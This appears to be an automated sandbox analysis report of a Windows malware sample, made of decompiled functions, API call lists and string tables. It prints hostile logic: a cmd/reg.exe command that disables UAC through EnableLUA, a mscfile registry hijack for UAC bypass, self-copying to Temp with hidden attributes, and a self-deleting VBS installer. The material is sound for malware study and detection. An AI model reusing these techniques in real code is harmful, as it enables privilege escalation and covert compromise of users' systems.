                                                                                                0x0040aa76
                                                                                                0x0040aa78
                                                                                                0x0040aa83
                                                                                                0x0040aa85
                                                                                                0x0040aaaf
                                                                                                0x0040aab5
                                                                                                0x0040aab7
                                                                                                0x0040ab66
                                                                                                0x0040ab72
                                                                                                0x0040ab77
                                                                                                0x0040ab7c
                                                                                                0x0040ab7d
                                                                                                0x0040abb6
                                                                                                0x0040abd4
                                                                                                0x0040abdd
                                                                                                0x0040abea
                                                                                                0x0040abf7
                                                                                                0x0040abfc
                                                                                                0x0040ac00
                                                                                                0x0040ac05
                                                                                                0x0040ac1d
                                                                                                0x0040ac6a
                                                                                                0x0040ac72
                                                                                                0x0040ac7a
                                                                                                0x0040ac85
                                                                                                0x0040ac90
                                                                                                0x0040ac9b
                                                                                                0x0040aca6
                                                                                                0x0040aca6
                                                                                                0x0040acb4
                                                                                                0x0040acf6
                                                                                                0x0040ad01
                                                                                                0x0040ad0c
                                                                                                0x0040ad17
                                                                                                0x0040ad1f
                                                                                                0x0040ad27
                                                                                                0x0040ad34
                                                                                                0x0040ad3f
                                                                                                0x0040ad48
                                                                                                0x0040ad5d
                                                                                                0x0040ad64
                                                                                                0x0040ad66
                                                                                                0x0040ad91
                                                                                                0x0040ad94
                                                                                                0x00000000
                                                                                                0x0040ad68
                                                                                                0x0040ad7f
                                                                                                0x0040ad85
                                                                                                0x0040ad88
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040ad8b
                                                                                                0x0040ad8b
                                                                                                0x0040ad66
                                                                                                0x0040ab83
                                                                                                0x0040ab88
                                                                                                0x0040ab8f
                                                                                                0x0040ab91
                                                                                                0x0040ab94
                                                                                                0x0040ab94
                                                                                                0x0040ab96
                                                                                                0x0040ab96
                                                                                                0x0040ab99
                                                                                                0x0040ab9c
                                                                                                0x0040ab9c
                                                                                                0x0040aba1
                                                                                                0x0040aba5
                                                                                                0x0040aba9
                                                                                                0x0040abb4
                                                                                                0x0040abb4
                                                                                                0x00000000
                                                                                                0x0040aba5
                                                                                                0x0040aabd
                                                                                                0x0040aac1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040aac7
                                                                                                0x0040aac9
                                                                                                0x0040aacc
                                                                                                0x0040aacc
                                                                                                0x0040aacf
                                                                                                0x0040aad2
                                                                                                0x0040aad2
                                                                                                0x0040aad8
                                                                                                0x0040aad8
                                                                                                0x0040aade
                                                                                                0x0040aae2
                                                                                                0x0040ab2f
                                                                                                0x0040aae4
                                                                                                0x0040ab0c
                                                                                                0x0040ab17
                                                                                                0x0040ab1f
                                                                                                0x0040ab1f
                                                                                                0x0040ab37
                                                                                                0x0040ab41
                                                                                                0x0040ab47
                                                                                                0x0040ab4d
                                                                                                0x0040ab53
                                                                                                0x0040ab55
                                                                                                0x00000000
                                                                                                0x0040ab57
                                                                                                0x0040ab5a
                                                                                                0x00000000
                                                                                                0x0040ab5f
                                                                                                0x0040ab55
                                                                                                0x0040aa93
                                                                                                0x00000000
                                                                                                0x0040aa9a
                                                                                                0x0040aa61
                                                                                                0x0040aa69
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040aa6b
                                                                                                0x0040aa6e
                                                                                                0x0040aa74
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040aa74
                                                                                                0x0040aa7c
                                                                                                0x0040aa7e
                                                                                                0x0040aa81
                                                                                                0x0040aa81
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 0040A9E3
                                                                                                • CopyFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\rem9090sta.exe,00000000,00000000,00000000), ref: 0040AAAF
                                                                                                • CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\rem9090sta.exe,00000000,00000000,00000000), ref: 0040AB4D
                                                                                                  • Part of subcall function 00418A4B: GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 00418BA2
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB8F
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040ABB4
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,0046079C,0046079C,00000000), ref: 0040AD7F
                                                                                                • ExitProcess.KERNEL32 ref: 0040AD8B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCopy$CreateDirectoryExecuteExitLongNamePathProcessShell
                                                                                                • String ID: """, 0$0f$6$C:\Users\user\AppData\Local\Temp\rem9090sta.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$x(f
                                                                                                • API String ID: 4018752923-1211673646
                                                                                                • Opcode ID: 929338f2029b4603b5cd494d6fbd571c9dcb1f4256eaf60fc116593e2e5a409c
                                                                                                • Instruction ID: 718e270501081baa5576db078e4b8e6ac0fd87abbbcd0a0dfe3fb1673bde29fb
                                                                                                • Opcode Fuzzy Hash: 929338f2029b4603b5cd494d6fbd571c9dcb1f4256eaf60fc116593e2e5a409c
                                                                                                • Instruction Fuzzy Hash: 28A1A271A0020856CB18FBA6CC92AEE7369AF54308F54447FF506B71E2EE3C5E46C65E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00418A4B, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 84%
                                                                                                			E00418A4B(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
				E00401F5F(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t85 = _t36 - 7;
				if(_t36 <= 7) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M00418C27))) {
						case 0:
							_push(L"Temp");
							goto L14;
						case 1:
							__ecx =  &_v620;
							__eax = E00417735(__ebx,  &_v620);
							__ecx =  &_v644;
							__eax = E00401EEC( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L14;
						case 3:
							_push(L"WinDir");
							goto L14;
						case 4:
							__eax = E00418004(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E00404260(__ebx, __ecx, L"\\SysWOW64") = E00437AEF(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = E00403022( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = E00401EEC( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = E00401EE2();
								__ecx =  &_v608;
								__eax = E00401EE2();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E00404260(__ebx, __ecx, L"\\system32") = E00437AEF(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = E00403022( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = E00401EEC( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = E00401EE2();
								__ecx =  &_v608;
								__eax = E00401EE2();
								__ecx =  &_v584;
								L5:
								__eax = E00401EE2();
								goto L15;
							}
							L16:
						case 5:
							_push(L"ProgramFiles");
							goto L14;
						case 6:
							_push(L"AppData");
							goto L14;
						case 7:
							_push(L"UserProfile");
							L14:
							E00409DFE(_t54,  &_v644, E00437AEF(_t54, _t57, _t85));
							goto L15;
					}
				}
				L15:
				__imp__GetLongPathNameW(E00401EDD( &_v644),  &_v524, 0x208); // executed
				_t39 = E00404260(_t54,  &_v560, _a4);
				_t40 = E00404260(_t54,  &_v636, "\\");
				E00403022(_t77, E00403022( &_v600, E00418E53(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E00401EE2();
				E00401EE2();
				return _t77;
				goto L16;
			}



























                                                                                                0x00418a4b
                                                                                                0x00418a5a
                                                                                                0x00418a5c
                                                                                                0x00418a62
                                                                                                0x00418a6a
                                                                                                0x00418a6d
                                                                                                0x00418a70
                                                                                                0x00418a76
                                                                                                0x00000000
                                                                                                0x00418a7d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00418a87
                                                                                                0x00418a8b
                                                                                                0x00418a91
                                                                                                0x00418a95
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00418aa8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00418ab2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00418abc
                                                                                                0x00418ac1
                                                                                                0x00418ac3
                                                                                                0x00418b1c
                                                                                                0x00418b2b
                                                                                                0x00418b32
                                                                                                0x00418b3b
                                                                                                0x00418b3d
                                                                                                0x00418b41
                                                                                                0x00418b48
                                                                                                0x00418b4c
                                                                                                0x00418b51
                                                                                                0x00418b55
                                                                                                0x00418b5a
                                                                                                0x00418b5e
                                                                                                0x00418a9a
                                                                                                0x00418a9a
                                                                                                0x00000000
                                                                                                0x00418ac5
                                                                                                0x00418aca
                                                                                                0x00418ad9
                                                                                                0x00418ae0
                                                                                                0x00418ae9
                                                                                                0x00418aeb
                                                                                                0x00418aef
                                                                                                0x00418af6
                                                                                                0x00418afa
                                                                                                0x00418aff
                                                                                                0x00418b03
                                                                                                0x00418b08
                                                                                                0x00418b0c
                                                                                                0x00418b11
                                                                                                0x00418a9e
                                                                                                0x00418a9e
                                                                                                0x00000000
                                                                                                0x00418a9e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00418b68
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00418b6f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00418b76
                                                                                                0x00418b7b
                                                                                                0x00418b86
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00418a76
                                                                                                0x00418b8b
                                                                                                0x00418ba2
                                                                                                0x00418bb1
                                                                                                0x00418bc0
                                                                                                0x00418be8
                                                                                                0x00418bf2
                                                                                                0x00418bfb
                                                                                                0x00418c04
                                                                                                0x00418c0d
                                                                                                0x00418c16
                                                                                                0x00418c23
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 00418BA2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LongNamePath
                                                                                                • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                • API String ID: 82841172-1609423294
                                                                                                • Opcode ID: 403aaa19e8e3832581e2f361f1f9deb2c97c10288c25cb5da4145e137c14fbc2
                                                                                                • Instruction ID: 51d1d3d7f88e16350ab95fa1488b961238f34f6f337266a5881a7e711dea3616
                                                                                                • Opcode Fuzzy Hash: 403aaa19e8e3832581e2f361f1f9deb2c97c10288c25cb5da4145e137c14fbc2
                                                                                                • Instruction Fuzzy Hash: 754104711082059AC244FB61DC92DEF77ACEF90759F20093FF546620E1EE78AA49C69F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040D441, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 46processCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 50%
                                                                                                			E0040D441() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v92;
				void* __edi;
				void* _t17;
				long _t19;

				_t19 = 0x44;
				E00432D80(_t17,  &_v92, 0, _t19);
				_v92.cb = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20); // executed
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}








                                                                                                0x0040d44c
                                                                                                0x0040d455
                                                                                                0x0040d45c
                                                                                                0x0040d465
                                                                                                0x0040d466
                                                                                                0x0040d467
                                                                                                0x0040d468
                                                                                                0x0040d485
                                                                                                0x0040d494
                                                                                                0x0040d4a1

                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,0040C61F,00000000,hpg,00000001), ref: 0040D485
                                                                                                • CloseHandle.KERNEL32(0040C61F), ref: 0040D494
                                                                                                • CloseHandle.KERNEL32(00000027), ref: 0040D499
                                                                                                Strings
                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D47B
                                                                                                • hpg, xrefs: 0040D448
                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 0040D480
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$hpg
                                                                                                • API String ID: 2922976086-1189185850
                                                                                                • Opcode ID: 2e2118817e8f502acfdd2e1190e306bd04eabddef8fd273a438d7d6f01bfe287
                                                                                                • Instruction ID: a3a3fe32f90edc64badf12bfe715de2fb6dc2482f279f9e2a3132b0cdf50f1a9
                                                                                                • Opcode Fuzzy Hash: 2e2118817e8f502acfdd2e1190e306bd04eabddef8fd273a438d7d6f01bfe287
                                                                                                • Instruction Fuzzy Hash: 2BF012B290022C7EEB105AE9EC85EEFBB7CEB44795F140476F604E6020D5705D1486A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00410A5F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00410A5F(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, char _a20) {
				void* _v12;
				char _v1040;
				long _t14;
				long _t17;

				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12); // executed
				if(_t14 != 0) {
					L3:
					return 0;
				}
				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12);
				RegCloseKey(_v12);
				if(_t17 != 0) {
					goto L3;
				}
				_t7 =  &_a20; // 0x406267
				E00405C28( &_v1040, _a16,  *_t7);
				E00405CAF( &_v1040, _a8, _a12);
				return 1;
			}







                                                                                                0x00410a7b
                                                                                                0x00410a83
                                                                                                0x00410acf
                                                                                                0x00000000
                                                                                                0x00410acf
                                                                                                0x00410a94
                                                                                                0x00410a9f
                                                                                                0x00410aa7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00410aa9
                                                                                                0x00410ab5
                                                                                                0x00410ac6
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00410A7B
                                                                                                • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410A94
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00410A9F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID: gb@$origmsc
                                                                                                • API String ID: 3677997916-4256530773
                                                                                                • Opcode ID: 1823a53dad216f1a30dafc6634c61693494ed829d6671228afa21b7da06727f8
                                                                                                • Instruction ID: 9a2dbdcb9e407d08664f94aa67f999e944967ad6c11b9f4ee351b82bfcc4cd16
                                                                                                • Opcode Fuzzy Hash: 1823a53dad216f1a30dafc6634c61693494ed829d6671228afa21b7da06727f8
                                                                                                • Instruction Fuzzy Hash: 8701A93280022CBBCF219FA1DC08DEF7F38EF557A5F004065BA0862061E67589A5EBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00418337, Relevance: 7.6, APIs: 5, Instructions: 69fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 91%
                                                                                                			E00418337(void* __ecx, long __edx, WCHAR* _a4, long _a8) {
				void* _v8;
				long _v12;
				long _t10;
				long _t11;
				void* _t12;
				int _t14;
				struct _OVERLAPPED* _t16;
				struct _OVERLAPPED* _t21;
				long _t24;
				long _t27;
				void* _t30;

				_push(__ecx);
				_push(__ecx);
				_t21 = 0;
				_v8 = __ecx;
				_t27 = __edx;
				_t10 = _a8;
				if(_t10 == 0) {
					_t11 = 0x40000000;
					_t24 = 2;
				} else {
					if(_t10 != 1) {
						_t11 = _a8;
						_t24 = _a8;
					} else {
						_t11 = 4;
						_t24 = _t11;
					}
				}
				_t12 = CreateFileW(_a4, _t11, _t21, _t21, _t24, 0x80, _t21); // executed
				_t30 = _t12;
				if(_t30 != 0xffffffff) {
					if(_a8 != 1 || SetFilePointer(_t30, _t21, _t21, 2) != 0xffffffff) {
						_t14 = WriteFile(_t30, _v8, _t27,  &_v12, _t21); // executed
						if(_t14 != 0) {
							_t21 = 1;
						}
						CloseHandle(_t30);
						_t16 = _t21;
						goto L13;
					} else {
						CloseHandle(_t30);
						goto L6;
					}
				} else {
					L6:
					_t16 = 0;
					L13:
					return _t16;
				}
			}














                                                                                                0x0041833a
                                                                                                0x0041833b
                                                                                                0x00418341
                                                                                                0x00418343
                                                                                                0x00418347
                                                                                                0x00418349
                                                                                                0x0041834b
                                                                                                0x00418363
                                                                                                0x00418368
                                                                                                0x0041834d
                                                                                                0x00418350
                                                                                                0x00418359
                                                                                                0x0041835c
                                                                                                0x00418352
                                                                                                0x00418354
                                                                                                0x00418355
                                                                                                0x00418355
                                                                                                0x00418350
                                                                                                0x00418376
                                                                                                0x0041837c
                                                                                                0x00418381
                                                                                                0x0041838b
                                                                                                0x004183b0
                                                                                                0x004183b8
                                                                                                0x004183ba
                                                                                                0x004183ba
                                                                                                0x004183bd
                                                                                                0x004183c3
                                                                                                0x00000000
                                                                                                0x0041839d
                                                                                                0x0041839e
                                                                                                0x00000000
                                                                                                0x0041839e
                                                                                                0x00418383
                                                                                                0x00418383
                                                                                                0x00418383
                                                                                                0x004183c5
                                                                                                0x004183cb
                                                                                                0x004183cb

                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00405F06,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,00418461,00000000,00000000), ref: 00418376
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00418461,00000000,00000000,00000000,00000004), ref: 00418392
                                                                                                • CloseHandle.KERNEL32(00000000,?,00418461,00000000,00000000,00000000,00000004), ref: 0041839E
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00405F06,00000000,?,00418461,00000000,00000000,00000000,00000004), ref: 004183B0
                                                                                                • CloseHandle.KERNEL32(00000000,?,00418461,00000000,00000000,00000000,00000004), ref: 004183BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                • String ID:
                                                                                                • API String ID: 1852769593-0
                                                                                                • Opcode ID: 7593ea156b25f21f6d9a2ab5bb20b7651b5366da688949f3836ca596567157fb
                                                                                                • Instruction ID: d74f83a6c6e0abcf35dadfeb7d7d7c2f5a7923569ffe6f1a5da60d4ad132d066
                                                                                                • Opcode Fuzzy Hash: 7593ea156b25f21f6d9a2ab5bb20b7651b5366da688949f3836ca596567157fb
                                                                                                • Instruction Fuzzy Hash: FF11C17120011CBFDB104F689C89EEB376CEB46765F18422EFD25DA280DA36CE815668
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044882A, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E0044882A() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t8;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E004487F3(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E00440C6C(_t19, _t7); // executed
						_t25 = _t8;
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E004414D5(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}













                                                                                                0x00448839
                                                                                                0x0044883f
                                                                                                0x00448897
                                                                                                0x00448897
                                                                                                0x00448841
                                                                                                0x00448842
                                                                                                0x00448847
                                                                                                0x00448850
                                                                                                0x00448856
                                                                                                0x0044885c
                                                                                                0x00448861
                                                                                                0x00000000
                                                                                                0x00448863
                                                                                                0x00448864
                                                                                                0x00448869
                                                                                                0x0044886e
                                                                                                0x0044888c
                                                                                                0x00448886
                                                                                                0x00448886
                                                                                                0x00448888
                                                                                                0x00448888
                                                                                                0x0044888f
                                                                                                0x00448894
                                                                                                0x00448861
                                                                                                0x0044889b
                                                                                                0x0044889e
                                                                                                0x0044889e
                                                                                                0x004488ac

                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00448833
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00448856
                                                                                                  • Part of subcall function 00440C6C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00440C9E
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044887C
                                                                                                • _free.LIBCMT ref: 0044888F
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044889E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                • String ID:
                                                                                                • API String ID: 336800556-0
                                                                                                • Opcode ID: 5aacbd926c009eb0687749a1ecdd7c1a74e4dbaf76035de02b4ab6db49c37299
                                                                                                • Instruction ID: ad69adcc79b35a3c1bf735b9d9c9e89d350c3c6e8865b9b0f8ec16f2c04a0f93
                                                                                                • Opcode Fuzzy Hash: 5aacbd926c009eb0687749a1ecdd7c1a74e4dbaf76035de02b4ab6db49c37299
                                                                                                • Instruction Fuzzy Hash: FB01B1626017147F37212AAB5C8CC7F7A6DDEC2BA5755022EFA04C7201EE688D4181B8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00410B7B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 77%
                                                                                                			E00410B7B(void* __ecx, short* __edx, short* _a4, char _a8, int _a32) {
				void* _v8;
				long _t14;
				signed int _t17;
				long _t20;
				signed int _t22;
				signed int _t23;

				_push(__ecx);
				_push(_t22);
				_t14 = RegCreateKeyW(__ecx, __edx,  &_v8); // executed
				if(_t14 != 0) {
					_t23 = 0;
				} else {
					_t17 = E0040247B();
					_t20 = RegSetValueExW(_v8, _a4, 0, _a32, E00401EDD( &_a8), 2 + _t17 * 2); // executed
					RegCloseKey(_v8);
					_t23 = _t22 & 0xffffff00 | _t20 == 0x00000000;
				}
				E00401EE2();
				return _t23;
			}









                                                                                                0x00410b7e
                                                                                                0x00410b7f
                                                                                                0x00410b86
                                                                                                0x00410b8e
                                                                                                0x00410bce
                                                                                                0x00410b90
                                                                                                0x00410b94
                                                                                                0x00410bb5
                                                                                                0x00410bc0
                                                                                                0x00410bc9
                                                                                                0x00410bc9
                                                                                                0x00410bd3
                                                                                                0x00410bde

                                                                                                APIs
                                                                                                • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,?), ref: 00410B86
                                                                                                • RegSetValueExW.KERNELBASE(?,0046079C,00000000,00000000,00000000,00000000,0046079C,?,80000001,?,004061BD,0046079C,C:\Users\user\AppData\Local\Temp\rem9090sta.exe), ref: 00410BB5
                                                                                                • RegCloseKey.ADVAPI32(?,?,80000001,?,004061BD,0046079C,C:\Users\user\AppData\Local\Temp\rem9090sta.exe), ref: 00410BC0
                                                                                                Strings
                                                                                                • Software\Classes\mscfile\shell\open\command, xrefs: 00410B84
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: Software\Classes\mscfile\shell\open\command
                                                                                                • API String ID: 1818849710-505396733
                                                                                                • Opcode ID: 6644561fe13a0524ec6befa8fe3b83b4386d3b958b6a850545e619c8f7894b61
                                                                                                • Instruction ID: 82f14cb9e3031a01d822d6d81441f6af2dedc3ed787e11c635c14dc79d111203
                                                                                                • Opcode Fuzzy Hash: 6644561fe13a0524ec6befa8fe3b83b4386d3b958b6a850545e619c8f7894b61
